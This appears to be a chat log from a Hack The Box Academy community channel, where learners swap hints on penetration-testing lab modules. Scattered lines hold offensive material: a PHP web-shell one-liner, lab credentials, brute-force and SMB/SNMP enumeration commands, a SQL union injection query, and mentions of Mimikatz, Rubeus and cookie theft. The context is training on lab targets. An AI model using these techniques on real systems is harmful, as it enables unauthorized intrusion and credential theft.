Show me the command you used for that
smbclient -U admin //ip/share
Use crackmapexec to enum shares
You have the right credentials, admin:123456
What is the sharedrive you found
Okay and what happens when you use the command I posted for smbclient
It shouldn't ask for root pass
Are you putting -U admin
👍
And you put: 123456
As the password
Hmm, Im unsure.
smbclient -U admin //ip/SHAREDRIVE
I'm unsure of how to help then, because that worked for me
Goodluck 👍
You are on Password Attacks - Medium Skills Assessment?
I’m unsure what to tell you I hope you can figure it out 👍
Np nice 👍
Question about Password Attacks easy lab - is the goal to just try to remote crack root's pass to ssh using crackmapexec/hydra and some wordlist (rockyou or the mutated one from resources)? Because there isn't much more in the task, but seems kinda... boring? dumb? I would think I am missing something normally, but with this module I am not sure anymore :/
What have you achieved so far in the lab?
Is anyone stuck on the footprinting hard lab? Trying to bruteforce the snmp community (worthless with the seclists snmp community lists) and rockyou... either kills the machine or gives false positives... what is usually the strategy you guys follow on selecting a wordlist for these, and why the hell is the lab again focused on getting one specific list -.-' not really sure how this helps getting the concepts
I mean not much. Just scanned the host and I am wondering what to do next. I just want to avoid going down a rabbit hole, which this module had plenty for me :/
Just started this lab
Perhaps spend more time, do what you learned throughout the module. You have no credentials and have two services running.
Now that you know there are two services and you have no access to them, what's the next step?
You mean two services?
I am in the section "Public Exploits" in Getting Started but I cannot connect to the server, I am on the VPN btw.
Yes my bad typo
And to answer that question - probably some more enumeration. Kinda don't know if that was a part of the module though...
Thanks 🙂
Well what about bruteforcing both services?
Well, that's what my first question was about - should I just bruteforce it?
Hi, is there anyone who can help me? I think that sequel is not working in TIER 1
The community string is in an SNMP list, onesixtyone will find it
Im not sure, should you? Why not try it 😄
Bruteforcing ssh is not a fun thing
Well, my first answer is no, because most of the engagements forbid that 😛 Lemme try that
Also - because it's boooooring 😛
Not in this case, bruteforce both services at the same time. You can use hydra for one and ncrack on the other, and maybe while these are running enum the services 👍
Password Attacks Module don’t forget
Yeah, I know. Hate that one...
hi guys. I could use a hint at Question 2 in Footprinting IMAP / POP3
What is the FQDN that the IMAP and POP3 servers are assigned to?
I've enumerated with nmap, connected to the POP3 and IMAP servers via openssl, and even tried to use dig ns inlanefreight... in desperation
neither the ...inlanefreight.htb nor the ...inlanefreight.htb seem to be the FQDN assigned to IMAP and POP3
maybe a kind soul could nudge me in the right direction. 🙃
Why would dev or ns be used for a mail server fqdn; also read the connection closely when you connect to it iirc it tells you
no matter what i do the only thing i get is the dev address when i connect to the imap and pop3 server. nowhere else is an address shown
Are you keeping the trailing . in your copy/paste
If so, that's why
Also delete that screenshot, spoilers
thanks for your help. I don't know what my problem was. Now it worked though. I could've sworn i copy pasted the same thing 3 times already into the answer box.
can anyone tell me why my reverse shell php isn't working on the very first File Upload Attacks module?
I keep getting the "failed to daemonize" error and <?php system($_REQUEST['cmd']); ?> doesn't work either
I'm using tun0 and it doesn't seem to be doing anything...
Yes that is what I’m trying for days 😦
You gave me that great hint to focus on that service (i was as well trying to bruteforce ssh and imap)
What is usually your strategy to pick a wordlist? (The 4 snmp related in seclists have zero matches)
Are there any plans to add more defensive/blue team modules/skill paths/job paths to Academy? I'm loving the current modules but it's very offensive centric and I'm hoping for some defensive stuff in the future
no clue about that. You could possibly try thinking about securing the stuff after you pwn it from the defenders perspective if that makes sense
Another hint: focus on the type of server, you probably got the word and overlooked it
I'm talking more investigation or forensics type of module, but your idea could work too if it was part of the skills assessment at the end I guess
well if you're interested in the forensics (i'm guessing some soc like stuff) there's probably not much such content on htb
HTB has always been (and likely always will be) focused on offensive security. If you're looking for some defensive stuff, tryhackme has been releasing defensive rooms pretty consistently lately
Yeah THM's recent expansion into defensive content is what made me think about it
I doubt HTB is gonna go the same route
Yeah I get that, if they ever do add more blue team stuff I think it would mesh really well with Academy's module style
It could, but like I said earlier, HTB has been and likely always will be primarily focused on offensive security. You get tidbits of mitigation and detection at the end of some modules but that's likely the most you'll ever see
how do i get the number of zones a domain has?
no clue what exactly you mean by that question
Yeaaah which is totally fine, I just love HTB as a platform and would like to see more variety in its content, but there's little reason to deviate from what they're already doing
dig @server ANY domain?
"Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer." the nameserver is ns.inlanefreight.htb
Thank you for your help, will try to look again
Server will be the IP
The module/section tells you exactly what to do
I get:
└──╼ [★]$ nslookup ns.inlanefreight.htb 10.129.203.205
Server: 10.129.203.205
Address: 10.129.203.205#53
Name: ns.inlanefreight.htb
Address: 127.0.0.1
When I AXFR I get:
```
inlanefreight.htb
origin = inlanefreight.htb
mail addr = root.inlanefreight.htb
serial = 2
refresh = 604800
retry = 86400
expire = 2419200
minimum = 604800
```
and the subdomains
what's the module?
to make it a link add http:// in front so i don't have to copy paste
i can't spawn the machine for a week now, NOSQLI assessment 1 won't work for me, but assessment 2 does...
that's so weird
can't spawn?
404 doesn't mean that the box is not running, i'd say it's exactly the opposite
well thats a point
ah right this module talks more about the nslookup tool i haven't done that yet
but the info should be there... I'm busy atm; so maybe someone else can nudge
if you can AXFR, you're probably golden then
all the info should be in the transfer
hmm
iirc
let me read through it one more time
^
Module Using Web Proxies. Page 8 / Encoding/Decoding. How to solve:
The string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools we discussed to decode it and get the flag.
try to use the decoding tools we discussed to decode it and get the flag.
so you're not gonna believe me but; you have to use the tools used in the module to decode it
it kinda tells you what to do
Yeah, I understand 😂, but there is a couple of encodings and I even cannot guess the order of them
if you're still having trouble, i'd try something like dig @10.129.203.205 ANY inlanefreight.htb no clue about the nslookup syntax
It's similar but nslookup gives slightly more info
It's not letting you paste as it's detecting it as spam
this stupid MEE6 bot tells me that I can't send the same message over and over again even though it's not the same
😄
I'll send you guys the response per DM
Yeah that happens when copying code blocks
possibly just paste the important part only?
i did
👀
Has anybody had any issues with breaking into slack by extracting the cookie? (WIndows Priv Esc -- Pillaging)
It starts with base64 then hint says to use url-encoding. What can I do after that? It seems that I've tried everything...
The encoded string:
VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0=
Yeah
no clue about that, have you narrowed it down to sth?
hint says to use url-encoding probably to get the end result
I've decoded that. Output is something unreadable
not as a jumping off point
Yeah. I swear I am following the modules instructions.
i could try to help but haven't done it
sec throwing it into decode to see if there's something else
This is raw out from base64 Decoding:
U2xSUk5FcFVWVEJLVkZGNVNsUmthVXBVVFhwS1ZGcHNTbFJaZWtwVVRYZEtWRmt3U2xSTmVFcFVXbXhLVkUweVNsUldiVXBVV214S1ZFMTRTbFJhYkVwVVdtaEtWRTB3U2uS'
5V³Tf4eeudT¤Åfµ¤tådç5V×F
e%edfu3 ¤v4åF$d¦ ¥wGuee%¤WEu&×C5S'
5FÕdf4ee%ÅfµWvUdç5VÆFe%ec# E3 ¤dÕE%F$d¦
µguefGF WEu%D#5S'
6 $c5 C Ò ØLÔ D0=
What Encoding probably is it?
Wait. Instructions say to use a different site
gimme a sec
@high sentinel Figured it out haha
Thanks for trying to help
you have it all wrong ...
@royal glade
- put the contents into the file
- base64 decode it
- think what encoding could be used next
- hint - ||only 2 types of encodings are used to get the flag||
cuddle time 👀
hey lager quick related question
yeah, sure 😄
Content is given to me as a zip file. It is base64 encoded string in there after unpacking. And after base64 Decoding I've got this
U2xSUk5FcFVWVEJLVkZGNVNsUmthVXBVVFhwS1ZGcHNTbFJaZWtwVVRYZEtWRmt3U2xSTmVFcFVXbXhLVkUweVNsUldiVXBVV214S1ZFMTRTbFJhYkVwVVdtaEtWRTB3U2uS'
5V³Tf4eeudT¤Åfµ¤tådç5V×F
e%edfu3 ¤v4åF$d¦ ¥wGuee%¤WEu&×C5S'
5FÕdf4ee%ÅfµWvUdç5VÆFe%ec# E3 ¤dÕE%F$d¦
µguefGF WEu%D#5S'
6 $c5 C Ò ØLÔ D0=
And I do not know what is this
does == denote base 16?
I get a different result after doing my decoding
not that i'm aware of, like base16 encoding or what do you mean specifically? base16 => hex?
sorry i meant at the end of the string and meant 32 not 16
Are u using burp decoder?
that's not correct i've said that already. Just use cyberchef for that
cause i'm curious and doing this while standing
the answer would probably be the same
i've gotten the flag on cli without issues
That task is to practice using burp decoder XD
lol
that's why i was sanity checking using a different decoder
two things - is the burp decoder setting as UTF-8 and b64?
i'd say burp decoder sucks, i never personally use it for anything
but just my opinion
sanity checking launching burp on mine
I'll check it because it's newly installed
figure sanity checking at least gets me a head start in the future :D
yeah copying the string you had previously in my burpsuite gives me the same thing I decoded previously, not the junk characters
are you throwing a hash in there? that may output the junk
What exactly should I change in burp settings because I don't see in the settings something like encoding, etc?
under decoder tab I just used decode as:
are you using a file or the raw text
And burp gives me smth weird, not the same string that throws for example cyberchef
Raw text
Just like this
Sorry?
cause it looks like the results you got are generally if you use one of the hash options
hmm
Just decode as base64
where do i get this word list for gobuster /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt ?
github
what is the module that you are doing?
link?
the walkthrough asks me to use this path /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt but this path does not exist in my vm
page 4
did you install seclists on your machine?
yes
then change the path to whatever the seclist path is on your system
it's shown as amass
what command are you using?
~/SecLists/Discovery/DNS/ if it's just downloaded to your home directory
gobuster Vhost
exactly? 😄
Marcielee you were right
but what's the difference between each wordlist
if i attack for real, do i have to check every single wordlist?
each wordlist has different words and different permutations of words
if you ls -la in that wordlist directory - you will see different filesizes
the top is just the most common ones
and contains however many words it says in it
depending on the wordlist you use it can take a while to finish
i still failed to find the subdomain
some wordlists contain the same words as another;
i see nothing wrong
it means page not found; not necessarily that it doesn't exist
Sometimes a 404 code just means it can't be automated
to be found
you'll learn a lot that sometimes you have to manually check the answers given by automated tools
Hey everyone, I'm on module 2 Web Enumeration and I am stuck. It says to use the Enumeration techniques shown to get the login credentials but I don't see any section to "Login". Is anybody available to give me a quick hand?
curl -v ip?
thanks marcielee
not sure what that means
So, I restart the burp and it works now
It says could not resolve host: ip
@cobalt trench replace "ip" with the IP of the target system
and possibly add a port to that
But I still do not understand how to solve it
recursive
It gives me the websites source code
I get after base64 Decoding another base64 string and what is next?
Yeah
what is the next logical step
no login credentials or flag that i can notice
yeah, the point is that there's something that likely is tied to the login functionality
One more time I know
something like <form>?
But after that I get not a base64 string
yep
reminder: what's the original question
<form id=setup method=post action=#>
i went to the host server/wordpress and checked the source code and found it there
curl -v didn't show <form>
Recursion:
see the definition of recursion
also delete this as it can be seen as a spoiler
looks like you're logging in on / then, there should be some <input> tags in the form which you use to submit the username/password
afk
I went to the target IP /robots.txt and found the directory
Thank you for the help.
np 🙂
Hi, I'm trying to find people to setup a discord call to work on some HTB machines/challenges, Id say I'm ~intermediate but all are welcome. Feel free to PM me if you're interested. Thanks!
Has anyone updated to windows 11? anyone recommend?
I'm running windows 11 atm @hazy grotto, I haven't had any issues with Vbox/HTB.
I like windows 11 so far
cool and all but not module related
verify your account in #welcome and post in a more relevant channel
anyone know how to fuzz fqdn. for example i want to scan inlanefreight.local for blog.inlanefreight.local or similar example
here is what i tried but it didn't work ffuf -u W1.inlanefreight.local -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:W1 -t 500
I am trying to do the system information section of the linux fundamentals module. When I try to ssh into the target it says permission denied. I'm using the vpn but it did the same thing when i tried the workstation in the web
sent u a dm @rustic sage
what exactly gives permission denied?
entering the password
turns out i accidentally missed the exclamation mark at the end
You need to fuzz the "Host" header. So like this: ffuf -u IP -H "Host: FUZZ.inlanefreight.local"
Don’t copy and paste my command. I’m on iPhone and it does weird quotation marks so it’s not gonna work
Thanks a lot man!
Hi all, could anyone share a hint for the starting point Meow that how can I get the root flag? thx!
this channel is for module discussion
sry, thanks!
#starting-point is the better place I think?
yo, does anyone know why the following query returns an error? select COUNT ( * ) from (select * from employees union select dept_no,dept_name,3,4,5,6 from departments);
the query between parenthesis works fine, but for some reason when i try to count the output number of rows it doesn't work
How do I use it on the final result of the query? Could you provide an example command please?
im stuck at the 4th question of
https://academy.hackthebox.com/module/34/section/306
can anyone help me?
doesn't work 😦
anyway it's okay, the query in itself returns the number of rows at the bottom of the table so it works out
yeah emp_no for example
but they do, that's why i run junk data in the second select query with 3,4,5,6
as i said the union query works fine, it's just when I try to pair it with the count that something fails
hey can you guide me on this?
I use Firefox & burp to intercept the request, and sometimes I find the post request from Firefox doesn't go to burp. i.e., in module/134/section/1219 & /settings.php when I want to change the password of a user. Has anyone got the same issue as me?
Should I be able to accomplish privesc to user2, and root, without uploading any scripts to the machine and solely with the information on academy about privilege escalation? I can't transfer files because the IP addressing for this module is different
Which module are you doing? Linux Priv Esc?
I’m doing the penetration testing path, and the module is getting started, priv esc… I’ve been able to root the box in knowledge check but I’m a bit stuck on this one
I’ve completed everything else in the module except this part
I will check my notes
There are 2 priv esc sub-modules XD, which one are you doing exactly?
In the module getting started, in the penetration testing path, there is a section called priv esc, you are given ssh credentials to ssh into the server, elevate to user2 and then root, but the ip addressing isn’t a 10.10. type address it’s 165.227.231.xx so I can’t upload any scripts to it
hmm, have you tried to ping from Target -> Attacker machine? I was able to upload files.
I’ve been able to upload files with all of the vpn connected machines
scp
I’ll try that thanks, I’m guessing any reverse shells won’t work due to the different ip addressing for this section
they can, but requires more setup from you to make sure any nat/firewall is port forwarding properly.
Hi, i just joined Hackthebox, and I'm looking to improve my computer forensic skills.
Is there a way to filer for boxes that require forensic analysis ?
Yes, click the academy x htb labs button on the sidebar
i tried that, and i can't find anything forensic wise.
And is port forwarding etc something that I need to set up to complete this module getting started/privesc? In the penetration testing path
no, scp works just fine
I meant for reverse shells. Or maybe I don't need a reverse shell. It's just that all the other machines connect through the vpn interface but this one is an ip like 165.227.231.233:32055 to ssh in to
you wont need a reverse shell for any of the public ip docker machines
Ok thank you
you could still set one up if you really wanted to, but it'd be extra work not expected by the module.
scp is just hanging. Connection timed out. It also doesn’t even mention file transfers until after the priv esc section so I’m wondering should I be able to elevate to user2 then root without transferring any scripts. Although the priv esc page does place an emphasis on priv esc scripts
you prob can, I dont remember
you rarely have to use priv esc scripts, they just automate a bunch of manual escalation checks
Intro to network traffic analysis is probably your best bet for finding machines, considering most are attack based
However, if you look at the challenges on HacktheBox then you will find more forensics
Hello
Im having an issue when i want to download a script from my webserver on the victim
Privilege Escalation section
oh, so you need to first do some easy machines, before you can see more?
never thought about doing network intro (i got a CCNA) but i guess i'll have to unlock stuff
got the community! yey \o/ note to future people doing this one: onesixtyone actually default "waiting" time between the requests only gives a result with a very generous timeout: 500 -> no hits, 1000 -> got the hits for a found community
hey i need help with this question : What is the path to the htb-student's mail?
Module? Have you exhausted and double checked what the module has told you so far
hi guys im at the footprinting module and i try to make a mssql query but impacket's mssqlclient.py doesn't work. im trying the sql powershell module at the moment but im not able to connect due to a lack of powershell knowledge, can someone help me pls?
Hi, I need help with Password Attacks Lab - Hard where we mount the BL file. I tried mounting it with cryptsetup method but it didn't show up on my Linux machine. Maybe I'm doing wrong. Can someone help me or point me to any article?
What exactly is the issue with mssqlclient?
| Incorrect syntax was encountered while parsing ''.
Invoke-Sqlcmd: Login failed for user 'backdoor'.
Invoke-Sqlcmd -ServerInstance "10.129.201.248" -Credential (Get-Credential) -Query "SELECT name FROM sys.databases"
I asked what the issue for mssqlclient is not Invoke-sqlcmd
| Incorrect syntax was encountered while parsing ''.
Invoke-Sqlcmd: Login failed for user 'backdoor'.
I transferred the file to a windows VM and mounted it there
that's what I was thinking Let me give it a try.
I know you can mount it on Linux. But I didn't bother trying to figure it out
lmao
My logic is ill always be able to boot up a windows vm
So why bother figuring out how to mount it on linux
You are like: I want no trouble mister. xD Thanks
Np
im trying with impacket mssqlclient.py again: ModuleNotFoundError: No module named 'impacket.examples.utils' can someone tell me what to do?
Guys for the file inclusion module Skills Assessment I just can't get the ||l** p* || to work, i found the min/index.php page which u lfi, but i just can't turn it into rce
[SOLVED]: i did the ||l P*|| method as shown in the section of the module, after a couple restarts of the box it worked :)
Heya! I might be just really really silly and naive, but in the Footprinting module, in the SMB section. I have everything else done from it but he second to last question stands: " Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. " . Now I have used ||rpcclient|| and its ||netsharegetinfo|| to obtain more information from the share and I can't for the life of mine to figure out what is the input the question is after :D
which sub-module?
It's not the netname, it's not the C:.*, it's not the //srvname/share or \srvname\share or whatever combination I can come up with that would be a valid answer for that in my head
Host Based Enumeration -> SMB
hmm I will have to review my notes. Maybe enum4linux can help
I'll give it a nudge.
Hey!
I'm doing the easy footprinting lab, and it's really bothering me that I was not able to do it without the hint.
Could you guys please tell me how to find the username + password?
Yup, use enum4linux 😁
I just checked my notes, you should be able to find it
dm me
Ok, thanks!
If you aren't able to find it, feel free to dm me @barren dirge
Hello everyone, I just want to ask what the right path is to catch the domain controller if I have a user that is admin on a computer and this computer is also admined by the Domain Admins group, and of course the administrator is a member of Domain Admins... I cannot find this in the modules, can somebody help me?
So the user that i have is domain admin?
No, the user that I have is a domain user, but is local admin on the computer, and the Domain Admins group is also local admin on that computer
dm me
So you're saying you have local admin on a machine where a domain admin is also local admin?
not exactly, the Domain Admins group is the local admin of that machine
I think he is trying to say that Domain Admins are members of the Administrators group of the local machine
I get what hes saying
Unfortunately though, afaik that means nothing.
I don't believe there's a way to exploit that
Having local admin on an AD machine is very useful because you can get SYSTEM access in a variety of ways and as SYSTEM you can do a lot of things. But a domain group having local admin access to a specific machine doesn't mean anything unless you can come to control an account within the group
And in this case, if you control an account within the Domain Admins group there's no reason to be having this conversation
He controls just a local admin
he can run LaZagne, Rubeus, Mimikatz, Inveigh etc.
to try to escalate
Yes, and what I'm saying is that has zero relation to the Domain Admins group
Yea obviously
btw do you know why this happens?
But his question was if he could abuse the fact that Domain Admins have local admin access to the machine. The answer is no
I'm having a segmentation fault error when running nmap with the -sV -sC flags
no idea
f